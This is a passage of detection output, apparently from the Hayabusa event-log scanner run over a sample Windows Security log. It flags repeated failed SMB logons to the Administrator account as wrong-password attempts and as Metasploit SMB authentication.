Password,User: Administrator : Type: 3 : Workstation: ZGMJKRYUlmijJV40 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv33to031A0fQzX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IT0bzycur7HXFeLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyY2K7tT0HgQ1ZL3 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6aexuFPH6FyEZ1bN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o8Iojas6sznqlYUE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U2SnliYkmx59ACSM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2plWY1GZHilHv5Vh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIfmqihMJdPVz80p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Odg692Eyde8md0t7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: gsQNvf5HkRQnbDul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: il2DGq3bzfwGuJN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9OsQFOcIyougrx0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gR8wpQrGYzd4NrBo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFjRsjWXbEPs9m1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wbjudOy3rWefzAIv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Q4gc8keCTv2HeE3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SmsaxHrHYuofUhAH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvhWasTJYmChfsNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DszGfEo9aua2y5UC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: lZPScjxczbrcJuvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucpjxJV4rBXOxy4e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BmTtDfX05VsKFrON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhWSUkQhv089RSfJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8RXCiXQYgjuPO78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfB3u3Np38FOw6hc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9GcSmto4jdCIw6H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HsogJdHUcldt7JeH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IUbkohKtCy6joOBY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9ZFyYxBrKnz652Co : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QQ2MHr71xALFHJqN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgjHOgEYRLQiJX75 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXLjSNCeDAaX4ttQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np6hwdqnWLJawVn9 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: adqqChrYx3lZ0BAa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1GTXkOnNYTws1MiC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QUvFvCM6AJhKjXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NiVgC8oJ5W2Xr3t0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hXfhdrbLnNOGDqy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcjMGbrHQHxIhSSh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: LDYPTYHHKAe39GjM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PF3H6LE6MqFjVWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LLTReOoxRa7UAhT3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqtqwAPBiBfaHNpv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmisFXzDpOILUhIX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W5UHqVVAYK08FWit : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKHLHN59FDnD92Sm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
